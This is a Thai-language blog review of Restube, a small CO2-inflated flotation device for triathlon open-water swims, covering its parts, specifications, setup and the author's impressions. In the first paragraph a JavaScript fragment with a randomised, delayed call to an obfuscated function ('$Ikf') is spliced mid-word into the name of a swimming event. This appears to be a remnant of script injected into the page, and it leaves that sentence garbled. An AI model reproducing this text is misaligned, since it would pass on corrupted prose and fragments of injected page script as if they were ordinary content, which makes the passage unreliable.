สมัยเมื่อเริ่มฝึกวิ่งระยะ 5-10 กิโลเมตรแรกๆ ก็ไม่เคยนึกว่าวันหนึ่งจะได้กระโดดมาเล่นไตรกีฬา ต้องมาว่าย ปั่นและจบท้ายด้วยอาชีพที่คุ้นเคย การวิ่ง กล่าวได้ว่าไตรกีฬายังเป็นกีฬาประเภทที่ต้องใช้ความอดทน (ทรมานบรรเทิง) หรือที่เรียกว่าสาย Endurance และกีฬาทรมานบรรเทิงส่วนมากที่นิยมในบ้านเราก็จะเป็นการปั่นและการวิ่ง แต่การว่ายน้ำเพิ่งจะเริ่มเข้ามา อย่างเช่น การแข่งขัน Thailandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Swimathon ที่จัดโดยจ่าโอ ซึ่งถ้าใครอยู่ในวงการไตรกีฬาหรือเริ่มฝึกว่ายน้ำแบบ Open ก็จะมีจ่าโอเป็นโค้ชคนแรกให้ละครับ ดังนั้นพวกอุปกรณ์เสริมสำหรับกีฬาทางน้ำจึงยังไม่เป็นที่แพร่หลายเหมือนกับอุปกรณ์วิ่งและปั่น
การแข่งไตรกีฬามีจุดวัดใจเริ่มแรกที่การว่ายน้ำแบบ open พุดกันง่ายๆ คือว่ายในคลอง ในอ่าง ในบึง ในทะเล ไม่ใช่ในสระน้ำที่สามารถยั้งเท้าถึงก้นสระได้ การที่นักวิ่งหรือนักปั่นจะต้องมาว่ายน้ำแบบ open หรือแม้แต่คนที่มีพื้นฐานว่ายน้ำอยู่แล้ว ถือว่าหนักเอาการ มีแรงกดดันและน่ากลัวมาก
ในการแข่งขันไตรกีฬา ด่านแรกที่ต้องว่ายน้ำนั้นหลายคนก็ได้ใช้อุปกรณ์ช่วยชีวิตทางน้ำ ( พวกอุปกรณ์ช่วยในการลอยตัว อย่างเช่น ทุ่นลอยตัว) ผูกติดกับร่างกายเพื่อความปลอดภัยและความสบายใจของนักแข่งไตร เวลาว่ายไปหากเกิดอุบัติเหตุหรือหมดแรงก็จะมีทุ่นช่วยพยุ่งไม่ให้จมน้ำ แต่เนื่องจากการใช้ทุ่นผูกติดตัวมีความเสียเปรียบในการทำเวลาและความเร็วในช่วงว่ายน้ำมาก หลายคนอยู่ในสภาพจำใจใช้ทุ่นลอยน้ำ นี้เลยเป็นช่องทาง เป็นโอกาสที่ผลิตภัณฑ์ Restube ได้แทรกตัวเข้ามา และเนื่องจาก Restube มีลักษณะที่เล็ก พกพาง่ายและแนบชิดกับลำตัว ลดแรงต้านน้ำเวลาว่าย เจ้า Restube ก็กลายเป็นคำตอบให้กับนักแข่งหลายๆ คน
1. Restube คืออะไร…อุปกรณ์ช่วยในการลอยตัว อุปกรณ์จำพวกช่วยชีวิต/กูภัย เป็น Safety device ทางน้ำแบบหนึ่งที่ออกแบบมาให้มีลักษณะเล็กและพกพาง่าย เหมาะกับกีฬาทางน้ำทุกชนิด และสำหรับใครที่ใช้สำหรับการแข่งขัน ต้องการความเร็ว เจ้า Restube ก็จะมีความได้เปรียบในเรื่องน้ำหนักที่ลดลง ความคล่องตัวและลดแรงต้านทานของน้ำ
2. Restube ประกอบด้วยอะไรบ้าง…พอลงแกะกล่อง Restube ออกมาดู องค์ประกอบหลักของ Restube ประกอบด้วย…
- สายคาดรัด ใช้คาดติดกับส่วนเอวส่วนสะโพกของร่างกาย สามารถปรับความตึงแน่นได้
- ซองเก็บตัวบอลลูน มีช่องให้ใส่กุญแจด้วย
- ตัวบอลลูน วาร์ปควบคุมและสายกระตุก (ที่จับปลายสายกระตุกเป็นนกหวีดในตัว)
- ตัวก๊าซหลอด Co2 Cartridge เป็นวัสดุที่ใช้แล้วทิ้ง เป็นตัวที่สามารถเปลี่ยนได้ ใครที่ปั่นจักรยานน่าจะคุ้นเคยดี เพราะประเภทเดียวกัน ตัวแก๊ส Co2 สามารถหาซื้อได้ตามร้านจักรยานครับ
ข้อมูลจำเพราะทั่วไป
- วัสดุหลักทำจาก Nylon / TPU
- ผลิตในประเทศเยอรมัน
- ขนาด 14 × 6 × 5 cm
- น้ำหนัก 240 g
- แรงลอยตัว หรือแรงพยุง (buoyant force) 75 นิวตัน หรือ 7 กิโลกรัม
- ตัวก๊าซหลอด Co2 ใช้ขนาด 16 กรัม
3. Restube ทำงานอย่างไร
การทำงานของเจ้า Restube เป็นระบบกลไกแบบแมนนอล “กระตุก พองตัวลอย” เจ้าบอลลูนจะพองตัวได้โดยก๊าซ Co2 ที่อยู่ในหลอด เมื่อตัวบอลลูนพองตัวก็จะมีแรงยกตัวขึ้นมา หน้าที่ต่อไปของผู้ใช้ก็คือการเกาะลอยคอ รอความช่วยเหลือจากเจ้าหน้าที่ต่อไป
ก่อนการใช้งานเราต้องทำการเซตอัพตัว Restube กันก่อนเลย โดยนำตัวก๊าซหลอด Co2 บรรจุเข้ากับวาร์ปของตัวบอลลูน จากนั้นพับเก็บซอง
คาดสายของ Restube เข้ากับลำตัว แนะนำบริเวณรอบๆ เอว จะหมุนไปด้านข้างซ้ายขวาก็ได้ แต่แนะนำให้หมุนไปอยู่บริเวณด้านหลังและหน้าพุ่งจะดีที่สุด เพราะโดยธรรมชาติ (หลังจากเล่นไตรมาหลายงาน) เวลาว่ายน้ำแล้ว เจ้าตัว Restube จะเคลื่อนลงมาตรงหน้าพุ่ง ไม่ก็อยู่หลังเอว
ก่อนใช้งาน ควรมีสติ (ที่จริงแล้วก็ไม่อยากใช้หรอก) สติเป็นสิ่งสำคัญที่สุดเวลาว่ายน้ำ ถ้ามั่วแต่ตกใจจนลืมก็คงไม่อาจกระตุกสายวาร์ปเพื่อเติมอากาศเข้าบอลลูนได้
4. สรุปผลการใช้งาน Restube
เวลารัดสายคาดเอว แนะนำให้รับแน่นกว่าเดิม เพราะเวลาว่ายน้ำ แรงดันน้ำจะกดให้บริเวณท้องหดลง ถ้ารับพอดีตัวจะหลวมและหลุดเวลาว่ายน้ำได้ แต่สำหรับกิจกรรมทางน้ำที่ไม่ต้องออกแรงว่ายน้ำมาก หรือต้องอยู่ในน้ำตลอดเวลา เหมือนการว่ายน้ำแข่งไตร หรือ Open Swimming (ว่ายแข่งบนทะเลเปิดหรือคลองบึง) ก็รัดแน่นพอดีตัวได้
เวลาในการพองตัวช้าหรือไม่…ไม่น่าครับ ประมาณ 1-2 วินาทีก็พองตัวเต็มที่ และตัวบอลลูนมีแรงพอที่จะทำให้เราลอยขึ้นมาได้ แนะนำว่าทำตัวนิ่งๆ ไว้ครับ ให้มันข่วยยกเราขึ้นมา แต่ถ้ามีสติดีมาก ในจังหวะนี้คว้าตัวบอลลูนไว้ด้วยเลย จะได้ลอยคอง่ายขึ้น